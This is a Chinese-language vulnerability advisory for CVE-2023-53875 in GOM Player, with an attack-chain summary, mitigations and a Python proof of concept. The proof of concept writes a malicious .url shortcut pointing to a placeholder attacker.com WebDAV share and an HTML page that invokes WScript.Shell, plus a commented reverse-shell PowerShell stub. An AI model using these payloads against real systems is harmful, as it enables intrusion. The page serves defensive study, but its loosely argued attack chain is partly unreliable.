CVE-2023-53875 GOM Player 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2023-53875

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GOM Player 2.3.90.5360

漏洞概述

CVE-2023-53875是GOM Player软件中的一个高危远程代码执行漏洞。该漏洞存在于GOM Player的Internet Explorer组件中，攻击者可以通过DNS欺骗技术利用恶意URL快捷方式和WebDAV技术诱导受害者执行任意代码。当受害者打开攻击者精心构造的恶意链接时，GOM Player的IE组件会尝试加载远程资源，攻击者通过中间人攻击方式注入恶意代码，最终实现远程代码执行并建立反向shell连接。攻击成功的前提是受害者需要访问攻击者控制的恶意URL，并且攻击者能够实施DNS欺骗或在SMB服务器上进行交互。该漏洞的CVSS评分达到8.8，属于高危级别，对系统机密性、完整性和可用性都造成严重影响。攻击者无需任何认证即可发起攻击，但需要用户交互才能触发漏洞利用过程。建议用户及时更新软件到最新版本，避免点击来源不明的链接，并在网络层面实施安全防护措施。

技术细节

该漏洞的技术原理涉及多个攻击技术的组合利用。首先，GOM Player 2.3.90.5360版本内置的Internet Explorer组件存在安全缺陷，当处理特定类型的URL快捷方式文件时，会触发不安全的资源加载行为。攻击者构造一个包含恶意SMB/WebDAV路径的URL快捷方式文件（.url），当受害者打开该文件时，GOM Player会尝试通过WebDAV协议连接到攻击者控制的远程服务器。在攻击的第二阶段，攻击者实施DNS欺骗或直接控制SMB服务器，诱导GOM Player的IE组件加载攻击者提供的HTML内容或可执行文件。由于IE组件的安全配置不当，加载的远程资源可以在用户上下文中执行任意代码。攻击者最终通过建立反向shell连接实现对目标系统的完全控制。整个攻击链利用了GOM Player对IE组件的信任关系、WebDAV协议的默认行为以及DNS协议的安全缺陷，成功绕过同源策略等安全机制。防御该漏洞需要从应用层和网络层同时采取措施，包括更新GOM Player到修复版本、禁用不必要的WebDAV功能以及实施网络层面的DNS安全防护。

攻击链分析

STEP 1

步骤1: 初始访问

攻击者诱使受害者打开精心构造的恶意URL快捷方式文件（.url），该文件包含指向攻击者控制服务器的WebDAV路径

STEP 2

步骤2: DNS欺骗/SMB交互

攻击者实施DNS欺骗攻击或将受害者重定向到恶意的SMB/WebDAV服务器，拦截GOM Player的连接请求

STEP 3

步骤3: 恶意资源传递

攻击者通过WebDAV协议向GOM Player的IE组件提供包含恶意代码的HTML页面或可执行文件

STEP 4

步骤4: 代码执行

由于GOM Player的IE组件安全配置不当，恶意代码在受害者用户上下文中执行，绕过同源策略等安全机制

STEP 5

步骤5: 反向shell建立

攻击者利用IE组件的执行权限建立反向shell连接，完全控制受害者的系统，获取机密信息并可进行进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2023-53875 PoC - GOM Player RCE via IE Component
# This PoC demonstrates the attack chain for educational purposes

import http.server
import socketserver
import os

# Malicious URL shortcut content (.url file)
malicious_url_content = '''[InternetShortcut]
URL=file://ATTACKER_SERVER/webdav/malicious.html
'''

# Malicious HTML that triggers RCE
malicious_html = '''<!DOCTYPE html>
<html>
<head><title>GOM Player Update</title></head>
<body>
<script>
  // Attempt to execute arbitrary code through IE component
  // In real attack, this would use various techniques like:
  // - HTA execution via mshta.exe
  // - Scriptlet execution via scrobj.dll
  // - ActiveXObject abuse
  
  // Example reverse shell payload (encoded)
  var shell = new ActiveXObject('WScript.Shell');
  // shell.Run('powershell -e BASE64_ENCODED_PAYLOAD');
</script>
</body>
</html>
'''

def create_poc_files():
    """Generate PoC files for testing"""
    # Create malicious URL shortcut
    with open('exploit.url', 'w') as f:
        f.write(malicious_url_content.replace('ATTACKER_SERVER', 'attacker.com'))
    
    # Create malicious HTML
    with open('malicious.html', 'w') as f:
        f.write(malicious_html)
    
    print('[+] PoC files created successfully')
    print('[+] 1. exploit.url - Malicious URL shortcut')
    print('[+] 2. malicious.html - Malicious payload page')

if __name__ == '__main__':
    create_poc_files()
    print('[!] This PoC is for educational/testing purposes only')
    print('[!] Do not use for unauthorized testing')

影响范围

GOM Player 2.3.90.5360

防御指南

临时缓解措施

临时缓解措施包括：1）不要打开来源不明的URL快捷方式文件；2）在防火墙层面阻断对可疑SMB/WebDAV服务器的连接；3）启用网络ACL限制仅允许受信任的服务器；4）监控DNS查询日志及时发现异常；5）考虑暂时使用其他播放器软件替代GOM Player；6）启用端点安全防护软件的行为检测功能。